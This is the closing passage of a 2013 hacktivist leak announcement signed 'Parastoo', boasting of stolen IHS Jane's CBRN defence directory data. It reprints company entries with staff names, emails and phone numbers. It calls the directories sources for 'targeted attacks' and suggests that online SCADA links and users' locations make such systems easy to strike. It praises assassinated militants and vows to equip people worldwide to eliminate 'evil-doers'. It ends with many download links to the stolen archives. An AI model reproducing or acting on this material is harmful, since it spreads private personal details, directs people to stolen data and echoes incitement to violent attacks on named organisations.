SWITCH AND OVERLOAD FUNCTION. THE SYSTEM IS
DESIGNED AROUND A MODULAR SYSTEM, WHEREBY
MULTIPLE UNITS CAN BE COMBINED TO CATER FOR
INCREASE REQUIREMENTS. THE UNITS THEMSELVES
ARE STACKABLE AND EASILY TRANSPORTABLE. THE
FFA400 - 100 CONSISTS OF A BLOWER, TWO M98
GAS AND PARTICULATE FILTER SETS, A FILTER
HOUSING A FRAME ASSEMBLY. A SPECIAL "Y" CABLE
HAS BEEN ADDED TO ALLOW THE FFA400-100 TO
RECEIVE ITS POWER FROM THE FDECU OR LECU
SPLIT PHASE CONNECTORS.
IHS OFFERS :
YOU CAN OBTAIN THE SPECIFICATIONS IS A PART
OF YOUR SUBSCRIPTION TO JANE’S INFORMATION
GROUP AS PART OF ITS JANE'S NUCLEAR,
BIOLOGICAL AND CHEMICAL DEFENCE .
NICE , SPECS . MILLIONS OF THEM . ONE SURE
WOULD NEED THEM IF COME BY HMI C&C LINK ON A
LEGACY SATELLITES SCPC SCADA INTERFACE ON THE
INTERNET . YOU GOT TO HAVE THE DETAILS TO
BLOW THE CRAP OUT OF A THINGY OF THIS KIND .
A QUICK SEARCH SHOWS 18 USERS OF THIS SYSTEM
AND GOOGLE MAPS OFFERS THEIR EXACT LOCATION .
SAMPLE TITLE 3 :
THE DIRECTORIES CONTAIN INVALUABLE SOURCES TO
DEVELOP TARGETED ATTACKS . HUNINTs COME TO
MIND FOREMOST..
- Avon Protection Systems Inc
503 Eighth Street
Cadillac
Michigan 9282
United States
Tel: (+1 1225) 89 65 64
Fax: (+1 1225) 89 63 01
www.avon-protection.com
Key Personnel
Marketing Manager: Julia Green
e-mail: julia.green@avon-rubber.com
Products/Services:
CBRN Defence Equipment
CBRN protective equipment
Individual CBRN protective equipment
CBRN respiratory protective equipment
Masks, gas
Body protection
- UTM (Ultimate Training Munitions Ltd)
Hampstead Avenue, Mildenhall, Suffolk IP28
7AS, United Kingdom
Tel: (+44 1638) 71 10 03
Fax: (+44 1638) 51 06 27
e-mail: sales@utmworldwide.com
Web: www.utmunitions.com
Activities/Services :
Manufacture and development of training
munitions, safety equipment and small arms
conversion kits.
Products/Services :
Weapon-related systems and equipment
Weapon-related systems and equipment,
ground-based
Weapon-related equipment, ground-based
Weapon-related components, ground-based
Ammunition, explosives, propellants,
pyrotechnics
Ammunition
Fixed base facilities and equipment
Training and simulation
Training facilities and equipment
Mission and weapon training systems and
simulators, army-related
Small arms training systems
Training equipment accessories
- First Line Technology LLC - FLT
3656 Centerview Drive
Suite 4
Chantilly
Virginia 20151
United States
Tel: (+1 703) 955 75 10
Freephone: (+1 866) 556 05 17
Fax: (+1 703) 955 75 40
e-mail: info@firstlinetech.com
Web: www.firstlinetech.com
Key Personnel
Vice President and Sales Director: Randy
Sakowitz
Tel: (+1 703) 955 75 10 (ext. 122)
e-mail: sakowitz@firstlinetech.com
Marketing Director: Jennie Tal Williams
e-mail: jwilliams@firstlinetech.com
Administrative Assistant: Ashley Andrzejewski
e-mail: aandrzejewski@firstlinetech.com
Activities/Services:
Supply out of the box solutions for first
responders and the military. Also provide
emergency response equipment solutions.
Products/Services:
CBRN Defence Equipment
CBRN protective equipment
Collective CBRN protection equipment
CBRN shelters
CBRN decontamination systems
CBRN emergency planning
Personal protection
- Biological Alarm Systems - BAS
645 Herzel St
Rishon Lezion
PO Box 80
IL-75267 Kiryat Arba
Israel
Tel: (+972 54) 466 99 84
Fax: (+972 2) 996 15 71
e-mail: info@basdetect.com
Web: www.basdetect.com
Key Personnel
Chief Executive Officer: Nir Zalmanov
Chief Technical Officer: Alex Keinan
Activities/Services:
Develop detection systems for air-borne
biological hazard.
Products/Services:
CBRN Defence Equipment
CBRN detection and monitoring systems and
components
SO MAYBE A MAN WITH A PLAN OR A SOPHESTICATED
ORGANIZATION CAN USE THE DIRECTORY ,GOOGLE
AND PERHAPS SOME GOVT SECRET GOODNESS
IN RETURN OF AN OLD FAVOR OR TO GET REVENGE
OF A MUTUAL FRIEND's ASSASSINATION ..TO GET
THE JOB DONE CHEAP , FAST , SAFE AND GREEN !
7.CONTACT
ALREADY SAID WE DONT HAVE INTERNET-SOCIAL
ACTIVITIES OF "ANY KIND". WE READ MANY ASKED
FOR CONTACT .
WELL , YOU WOULDNT NEED IT , REALLY . WE
WRONG ? OK .
FOLLOWING FAX IS OUR ONLY CONTACT AT THE
MOMENT .
89314148
TO ADD A BIT LULZ TO THE MIX , WE LET BOTH
PROFESSIONALS AND THE KIDS TOOK THE CHANCE
AND RESERVE A PREFIX TO PWN
"HAPPY WANDERERS" :)
8. EPILOG
"STRINGER: YOU KNOW, AVON, YOU GOTTA THINK
ABOUT WHAT WE GOT IN THIS GAME FOR, MAN. HUH?
WAS IT THE REP? WAS IT SO OUR NAMES COULD
RING OUT ON SOME FUCKING GHETTO STREETCORNER,
MAN? NAH, MAN. THERE'S GAMES BEYOND THE
FUCKING GAME."
( WE HAVE EXAMINED THIS APPROACH AND IT WORKED
FOR US FOR A GOOD MANY NUMBER OF YEARS .
STREET-EASY ENGLISH MOVIE QUOTES
OR CULTURALLY FAMILIAR WESTERN MP3S PLAYED IN
CONSOLE AND COPIED TO VIM HELP BROTHERS WHO
DONT SHARE OUR LANGUAGE ,
VALUED CONCEPTS AND MINDSET TO GET SOMEHOW
CLOSER TO THE IDEA , NO MATTER THE OUTCOME IT
MAKES THE TALK A LOT EASIER)
PARASTOO DEDICATES THE OUTCOME OF THIS OP IN
A GREAT DATE , TO THE GREAT "ROOHOLLAAH" THAT
TRIGGERED US HAPPEN .
WE CAN NOT PAY ENOUGH RESPECTS UNLESS WE GO
"BEYOND" THE SEEMINGLY TRANSPARENT WALL
ENGINEERED AROUND US SUITED FOR
MODERN SLAVERY , BY WAR CRIMINALS WHO KILL
MILLIONS , DONT FIND ANY WMD AND STILL NAME
OTHERS HOSTILE NATIONS .
TO GET THINGS FAIR , PARASTOO FOLLOWS
ROOHOLLAH SAME AS RIP MAHMOUD AL-MABHOUH AND
RIP EMAD MOGHNIYYAH WHOSE BIRTHDAY AND
ASSASINATION DATES ARE MAKED CLOSE TO THE
RELEASE OF THIS OP . WE WILL EQUIP NAMELESS
SELFLESS PRACTITIONERS ALL OVER
THE WORLD WHO BELIEVE A RUTHLESS CHEMOTRAPY
DESIGNED FOR THE ROOT OF "THE CANCER" IS
NEEDED TO CANCEL THE EVIL-DOERS
FOR GOOD . YOU ARE NOT ANONYMOUS . EXPECT US.
+------------------------------------------+
"THE LIKENESS OF THE ONES WHO HAVE TAKEN TO
THEMSELVES PATRONS APART FROM ALLAH IS AS
THE LIKENESS OF THE SPIDER THAT TAKES TO
ITSELF A HOME; AND SURELY THE FLIMSIEST
(FRAILEST, FEEBLEST) OF HOMES IS INDEED
THE SPIDER’S HOUSE, IF THEY KNEW(THE TRUTH)"
+------------------------------------------+
SUNDAY, 10 FEBRUARY, 2013
P.
ATTACHED :
1. 7Z OF THIS MESSAGE AND A COUPLE OF PIX
2. 17*30MB 7Z FILES CONTAINING IHS CBRN
3. IT IS UP TO YOU HOW TO DEAL WITH INFO
AND IT IS YOU WHO DOWNLOADS STUFF FROM THE
INTERNET OR MAKE CALLS . PROTECTS YOURSELF
OR WALKAWAY . IT'S YOUR ASS , AFTER ALL .
by the way , redundancy has been a factor
so be careful to avoid downloading the
same from different sources .
1.
http://www.mixturecloud.com/media/a1yDTfqF
http://hipfile.com/nuxlqphnxm0y
http://filedefend.com/jmafk39p2vu7
http://uptobox.com/k4z7pq0hgcbg
the rest . sorry , we know its messy and ask
sincerely apologies :) make a curvball of files
of file coming from diff hostings was not
a random design
we believe before you know it
many people make all-in-one downloads make it
easy for who just wants read in some [*]Pad
good news is a LOT of time is needed to
get the release vanished and that is more
than enough for the people who do the first
thing
http://www2.zshare.ma/npm8iphpne8d
http://uptobox.com/jv3uhhu8jyuz
http://hipfile.com/yr3dvo4ngcye
http://filedefend.com/vuy3mu6drtr0
http://www2.zshare.ma/npm8iphpne8d
http://uptobox.com/jv3uhhu8jyuz
http://hipfile.com/yr3dvo4ngcye
http://filedefend.com/vuy3mu6drtr0
http://hipfile.com/zhxp1mxofdaw
http://www2.zshare.ma/z8o9fkcdzdrd
http://uptobox.com/39bq62q3sawt
http://filedefend.com/qfig3yqmkl5n
http://uptobox.com/oysyh9rmy3st
http://www2.zshare.ma/6xflp1046eaz
http://hipfile.com/0xgigrb588dx
http://filedefend.com/qfig3yqmkl5n
http://uptobox.com/88zrhxgfwymz
http://www2.zshare.ma/unfjcv9dgqla
http://hipfile.com/80q0hvms5sai
http://filedefend.com/of661cwidlqt
http://uptobox.com/vvfznhk7b13p
http://filedefend.com/mwhl3v4kijdo
http://hipfile.com/ypab6x17jeeq
http://www.mixturecloud.com/media/CqgFXAJj
http://uptobox.com/lti1xmp0k3lk
http://filedefend.com/os3pcs31ippt
http://hipfile.com/mmm6jk4m1kob
http://www.mixturecloud.com/media/roF1L1zv
http://uptobox.com/69k0w3emyxx0
http://filedefend.com/6pbn6u0hk5e1
http://hipfile.com/lj6fwo7nau5t
http://www.mixturecloud.com/media/MMjSBV36
http://uptobox.com/bxj346zg056l
http://filedefend.com/ixb1cpfyaror
http://hipfile.com/kmgrkfhfsiqo
http://www.mixturecloud.com/media/Nat86ygm
http://uptobox.com/gz7y1vf3vq8b
http://filedefend.com/bcngtjllruwv
http://hipfile.com/4xyunsi50s4y
http://www.mixturecloud.com/media/vqeA3LJL
http://hipfile.com/96bqgjbeny14
http://filedefend.com/fwf3p2c8877h
http://www.mixturecloud.com/media/PK7UM8Lf
http://hipfile.com/96bqgjbeny14
http://uptobox.com/e98jztldkewr
http://filedefend.com/cibgeceu763x
http://hipfile.com/eh90bl569k1y
http://www.mixturecloud.com/media/SfNCFleX
http://uptobox.com/4aieu7pl67jx
http://filedefend.com/if4yzkjp0761
http://hipfile.com/tt4ip8myhu0b
http://www.mixturecloud.com/media/L5dX53GV
http://uptobox.com/zmi3ekjlgu3a
http://filedefend.com/1rm6l43oysj3
http://hipfile.com/rhb5n5j0vmzl
http://www.mixturecloud.com/media/XrkRAdxC
http://uptobox.com/im48ufuo5iax
http://filedefend.com/im7j57rsq6ud
http://hipfile.com/i0s51vuq6jc7
http://www.mixturecloud.com/media/GRSvIF0u
http://uptobox.com/y6s4arlenx1m
http://filedefend.com/zt5d8tb9l006
http://hipfile.com/8czrv67wlba8
http://www.mixturecloud.com/media/rQheQ3tQ
http://uptobox.com/tfn2cgi4qglv
http://filedefend.com/1xbxy1wvcusg
http://www.embedupload.com/?HP=61EGBSMUY2
http://www.mixturecloud.com/media/JQHljjfy
|
